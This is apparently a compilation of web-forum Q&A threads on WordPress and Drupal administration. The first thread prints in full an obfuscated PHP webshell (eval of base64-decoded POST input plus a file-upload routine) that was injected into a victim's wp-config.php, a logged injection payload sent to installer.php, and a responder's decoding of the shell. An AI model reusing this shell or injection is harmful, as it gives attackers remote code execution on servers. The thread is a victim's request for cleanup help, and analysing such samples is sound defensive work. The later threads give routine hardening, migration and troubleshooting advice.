Wordpress hack keeps severing database connection - wordpress

I have a Wordpress site that keeps severing database connection and I am not sure how to find or clean up or get rid of the root cause.
The issue is that there is this odd script that keeps popping up on the wp-config.php file. I delete it, correct the credentials, site comes back up just fine. In about a day or so- same thing happens. The database credentials are reset and this foreign script appears again.
This is the output I keep seeing after the attack:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'test');
file_put_contents('accesson.php', '<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){#$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>'); /*');
file_put_contents('accesson.php', '<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){#$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>'); /*');
/** MySQL database username */
define('DB_USER', 'user');
/** MySQL database password */
define('DB_PASSWORD', 'taskh60J0f');
The code seems to reference accesson.php. So I looked at that file and this is the code that it has:
<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){#$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>
I reset the db connection again and deleted the accesson.php file from the root directory but am not 100% that this will no longer occur. My question is how do I clean this up 100%? I also want to note that I am not a developer. I know how to read code, but am not real proficient at writing it. Any help would greatly be appreciated.

Had the same attack on a site we have recently started hosting - repeated extra code added to config and accession.php dropped into the web root.
In our instance the cause of the problem was a file named installer.php and another file named installer-backup.php - these came with the site when we imported it.
In one of our protection plug-in threat logs we found repeated POST attempts to installer and installer-backup.php details as follows.
"name": "POST.dbname",
"value": "test\\');\nfile_put_contents(\\'accesson.php\\', \\'<?php echo 7457737+736723;$raPo_rZluoE=base64_decode(\\\"Y\\\".chr(109).\\\"F\\\".chr(122).chr(90).\\\"T\\\".chr(89).chr(48).chr(88).\\\"2\\\".\\\"R\\\".\\\"l\\\".\\\"Y\\\".chr(50).\\\"9\\\".chr(107).\\\"Z\\\".chr(81).\\\"=\\\".\\\"=\\\");$ydSJPtnwrSv=base64_decode(chr(89).\\\"2\\\".chr(57).chr(119).chr(101).chr(81).chr(61).\\\"=\\\");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87).\\\"Q\\\".chr(61))]));if($_POST[base64_decode(\\\"d\\\".chr(88).chr(65).\\\"=\\\")] == base64_decode(\\\"d\\\".\\\"X\\\".chr(65).chr(61))){#$ydSJPtnwrSv($_FILES[base64_decode(chr(90).\\\"m\\\".\\\"l\\\".\\\"s\\\".chr(90).\\\"Q\\\".\\\"=\\\".chr(61))][base64_decode(chr(100).chr(71).chr(49).\\\"w\\\".\\\"X\\\".chr(50).\\\"5\\\".chr(104).\\\"b\\\".chr(87).\\\"U\\\".chr(61))],$_FILES[base64_decode(\\\"Z\\\".chr(109).\\\"l\\\".\\\"s\\\".chr(90).\\\"Q\\\".chr(61).chr(61))][base64_decode(chr(98).\\\"m\\\".\\\"F\\\".chr(116).\\\"Z\\\".chr(81).chr(61).\\\"=\\\")]);}; ?>\\'); \/*"
This creates the accession.php file withe the code as per the original post.
Decoding that gives:
echo 7457737+736723;
$raPo_rZluoE = 'base64_decode';
$ydSJPtnwrSv = 'copy=';
eval(base64_decode($_POST['id']));
if($_POST['up'] == 'up'){copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);}
So looks like accession.php will do what its name suggest and provide a route to copy files onto the server.
This necessitated a total wipe out and rebuild after a manual scan of the db - which did not show anything suspicious.
Nothing untoward has happened since the rebuild except someone is making many attempts to POST to no non-existent installer and installer-backup.php.
Interestingly, we have so far not seen any attempts to POST to accession.php

Related

Brute force attack / user enumeration

Since last week I keep getting alerts about failed login attempts on my wordpress site.
The first couple of days the attacker used wrong username and subsequently was locked out after 3 attempts. I use the sucuri free and wp-security plugins. The later one has a login lockdown function.
My surprise came when after a couple of days the attacker found and used my username. I immediately changed it to a new username thinking that I would be safe. I also used most of the hardening options on both plugins. I specifically checked that the string
?author=n, does not provide any results on my website.
Regardless, today I got 3 more alerts that someone tried to login with this new username, which means I am locked out of my own site for 24 hours.
This leaves me wondering:
a) how is it possible for someone to find my username?
b) is there any other plugin like cerber security that prevents these exploits?
c) is there any rule I can add to htaccess? (although I believe that sucuri and wp-security have added several rules)
many thanks!
listing users
A user can list your usernames using :
yoursite.com?author=1
Where the ID is a user_id.
You can prevent it by detecting the author page, and redirect it with this for example (put in your theme function.php):
// Disable access to author page
function remove_author_pages_page() {
global $wp_query;
if ( is_author() ) {
$wp_query->set_404();
status_header(404);
wp_redirect(get_option('home'));
}
}
add_action( 'template_redirect', 'remove_author_pages_page' );
Find username from wp-admin
A attacker can find username by tring to login on wp-admin
If a attacker enter a good username, even with a wrong password, wordpress error message changes so attacker knows that the username exist
You can add this code to your function.php to prevent wp-admin wrong login error messages giving any pieces of information.
code:
function no_wordpress_errors() {
return '<strong>Error</strong>: check your logins';
}
add_filter( 'login_errors', 'no_wordpress_errors' );
prevent wp-admin bruteforce
This is a solution I really like:
It use the wp-fail2ban plugin
Your server needs the fail2ban package installed and configured
This package allows you to ban (from iptables) IP that fails to many time to connect SSH, or brute-force a port
the wp-fail2ban plugin gives you a custom fail2ban jail to add to your fail2ban jails (wp plugin have a complete documentation about it)
with both installed, fail2ban will ban IP that fails too much on WP-admin (on the IPtable level, so PHP is not even reached. Attacker, in the end, won't use much server resources as the server will block his IP. He cannot even reach PHP)
Some other plugin (like Wordfence) also provides some security, but as it reaches PHP attacker use much more resources. But it needs less technical knowledge to implement.

How can I change entire URL when transfer same WordPress database to another domain database?

I have a WordPress site called: www.myfirstwp.com.
I want to transfer it's database to new domain which is www.mynewwp.com.
I did it by exporting the DB from www.myfirstwp.com and imported it to www.mynewwp.com
But in this new site ( www.mynewwp.com ) database have all old one database URL.
So, How can I change entire url of old one (www.myfirstwp.com) database in new one ( www.mynewwp.com ) database? Is there any way to do this?
Thank You.
Update Question :
I have an issue in WordPress. When I try to importing XML file with Attachments it's showing me following error message :
Error Message :
Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator and inform them of the time the error occurred, and the actions you performed just before this error. More information about this error may be available in the server error log. Apache Server at mysite.com Port 80
what should I do to solve this type of error message as I am a new user in WordPress.
Thank You.
NOTE: before you tinker with your database be sure to grab a backup first. You do not want to mess up a production database.
The simple way is to open the database on your new domain, open {$prefix}_options and change the home and siteurl rows to reflect the new domain.
This approach works and allows you to operate the site at minimum. The other problems include:
Embedded media links which use the old domain
Other post meta fields and option fields that may contain the old domain.
What I do when this happens is to use raw SQL inside phpMyAdmin (or similar) to search and replace. The following queries take care of post meta and options (95% of the time):
UPDATE wp_options SET option_value = REPLACE(option_value, 'olddomain.com', 'newdomain.com');
UPDATE wp_postmeta SET meta_value = REPLACE(meta_value, 'olddomain.com', 'newdomain.com');
The following tables and columns usually have contained domain references in WP:
wp_options.option_value
wp_postmeta.meta_value
wp_posts.post_content
wp_posts.guid
But there might be more places where the domain has been inserted.

Connect drupal site to moodle site

I am using drupal 7.27 version in which I need to connect to moodle site and its database. So I used drupal module moodle_connection to connect it withmoodle site. As it does not offer any end feature functionality. I installed another module called moodle_views but unfortunately there is no data received from the moodle. When I debug I found that connection does not establish between both the sites.
I am calling moodle_connector_connect() function in custom module to connect to Moodle. But no success. And in the moodle connector settings I put the following information:
Database Type : mysql
Database Server : localhost
Database TCP Port : 3306
Database Name : drupal_moodle ('Name of the moodle database')
Database Prefix : mdl_
Database User : root
Database Password : (I don't have password for my database user so I kept blank)
Moodle URL : drupal_moodle (Moodle site url)
Please help me to get out of this.
Regards
Neha
Reading over the bug reports in the Drupal module moodle_connector, I noticed some issues related to setting values for the moodle database connection variables, and some issues with handling error conditions.
Combine this with your mention of blank password, suggests the following line might be a problem.
Reading moodle_connector.module, around line 51 I notice some lazy checking for unset parameters.
// Return false if settings are incomplete.
if (!$type || !$server || !$port || !$username || !$password || !$database) {
return FALSE;
}
It looks like the check for !$password will cause the function moodle_connector_connect() to exit and not connect to the moodle database if any of the values are unset or empty.
As a workaround, and a step in right direction security-wise, could you create a new MySQL user, specifically grant it the necessary privileges to allow Drupal to read the Moodle DB and set a password.
I would also strongly advise that you read over the MySQL 'post installation' section of the manual which advises setting a password on the root user accounts. Having no root password is convenient during initial installation, but is a security problem. Any ordinary user on the machine, or a nearby machine which can connect to port 3306, could gain full access to the database.
http://dev.mysql.com/doc/refman/5.1/en/postinstallation.html

How to create encrypted hash passwords for drupal 7

After searching over internet I came to know that With drupal 7, password are no more encrypted through md5.
What are possible ways to get passwords encrypted in Drupal 7??
With drupal 7, password are no more encrypted through md5.
There are several way to get/set a password in drupal7.
Using drush (for your information, not used in your case):
drush upwd admin --password="newpassword"
Without drush, if you have a cli access to the server : (for your information, not used in your case)
cd <drupal root directory>
php scripts/password-hash.sh 'myPassword'
Now copy the resultant hash and paste it into the query:
update users set name='admin', pass='pasted_big_hash_from_above' where uid=1;
Thanks Malik.
After search I found different solutions. Following solution also works
If you are working on a remote environment on which you cannot connect, you can put this specified code in a file such as password.php such as this one:
<?php
if (isset($_GET['p'])) {
require_once dirname(__FILE__) . '/includes/bootstrap.inc';
require_once dirname(__FILE__) . '/includes/password.inc';
print _password_crypt('sha512', $_GET['p'], _password_generate_salt(DRUPAL_HASH_COUNT));
exit();
}
print "No password to hash.";
And then hit your site using: http://domain.tld/password.php?p='MyPassword'. The hash will appear on your browser's tab.
Don't forget to remove it once you done it.
So, if you want to use some password function generation, have a look on _password_crypt() and _password_generate_salt()
The user_hash_password() function can be used to hash password, if you want to use it outside from outside Drupal, you need to bootstrap Drupal configuration.
chdir("/path/to/drupal");
require_once './includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_CONFIGURATION);
user_hash_password($password);

How to Resolve "Error Establishing a Database Connection" on WordPress XAMPP Localhost for Google App Engine

Following Google App Engine's instructions for creating a local WordPress development platform, I created the database and initial user using the instruction's MySQL direction:
CREATE DATABASE IF NOT EXISTS wordpress_db;
CREATE USER 'wp_user'#'localhost' IDENTIFIED BY 'wp_password';
GRANT ALL PRIVILEGES ON wordpress_db.* TO 'wp_user'#'localhost';
After running it without errors reported, MySQL subsequently reported back:
CREATE DATABASE IF NOT EXISTS wordpress_db;# 1 row affected.
CREATE USER 'wp_user'#'localhost' IDENTIFIED BY 'wp_password';# MySQL returned an empty result set (i.e. zero rows).
GRANT ALL PRIVILEGES ON wordpress_db.* TO 'wp_user'#'localhost';# MySQL returned an empty result set (i.e. zero rows).
While the command line runs dev_appserver.py, I try reaching the WordPress app and get instead:
Error establishing a database connection
I've removed and recreated the database (wordpress_db) and user (wp_user) without reaching the WP app.
Any suggestion how to resolve this is appreciated.
Thanks, this is my App Engine log:
2013-11-26 17:40:25 Running command: "['C:\Program Files\Python27\python.exe', u'C:\Program Files\Google\google_appengine\dev_appserver.py', '--skip_sdk_update_check=yes', '--port=8080', '--admin_port=8000', u'C:\Documents and Settings\User\My Documents\Catalyx\Catalyx-GoogleAppEngine\Catalyx']"
2013-11-26 17:40:26 (Process exited with code -1073741515)
As you have mentioned you are following googles own instructions...
then in the section titled ...
Step 4. Create your wp-config.php configuration file
where the instructions state that you should replace the existing lines with the following:
/** The name of the database for WordPress */
define('DB_NAME', '**wordpress_db**');
/** MySQL database username */
define('DB_USER', '**wp_user**');
/** MySQL database password */
define('DB_PASSWORD', '**wp_password**');
You should enter those lines without the ** either side of the words like so...
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress_db');
/** MySQL database username */
define('DB_USER', 'wp_user');
/** MySQL database password */
define('DB_PASSWORD', 'wp_password');
When you hit the default root url for your local app - normally localhost:8080 you may get some odd redirects, so instead go direct to the local Wordpress install url...
http://localhost:8082/wp-admin/install.php
You should then get the nice Wordpress install page that you were expecting
This happens to me and I have a very 'good' evening with it. So hopefully someone can found this problem earlier...
I am trying to replicate the server wordpress on localhost. After replacing the actual URL with localhost, thing works perfectly. Except one thing, the newly created page is always in "Error Establishing a Database Connection”.
Let me put in sequence why this problem happened.
on local pc I already have an old wordpress directory wp/
on server my wordpress was placed under wp/
when i copy the package to my local pc, i placed it to wp2/ (remember wp/ already taken?)
So who's the culprit? it's the .htaccess
RewriteBase /wp/
So it pointing to another database used by wp, which is of course resulting in error!
The fix is easy, just change it to wp2!
RewriteBase /wp2/
Voila! Cheers and the evening suddenly become beautiful again! :)
To fix this problem try those fixes :
Open wp-config.php, check line DB_USER, DB_PASSWORD, DB_HOST, DB_NAME. Make sure the values is same with mysql access.
If you use Dedicated server or VPS hosting, try to restart your mysql server by typing :
-service mysql restart
or
-service mysql start
but if you use shared hosting, ignore this step!
if all the previous fixes can not fix it, so it's a server-side problem! it is not your error! so let the hosting company fix this error for you because it is their error!
contact them or give them a day or so and they will solve this error and the problem will disappear automatically.
you can also check this video for the error establishing database connection fixes

Resources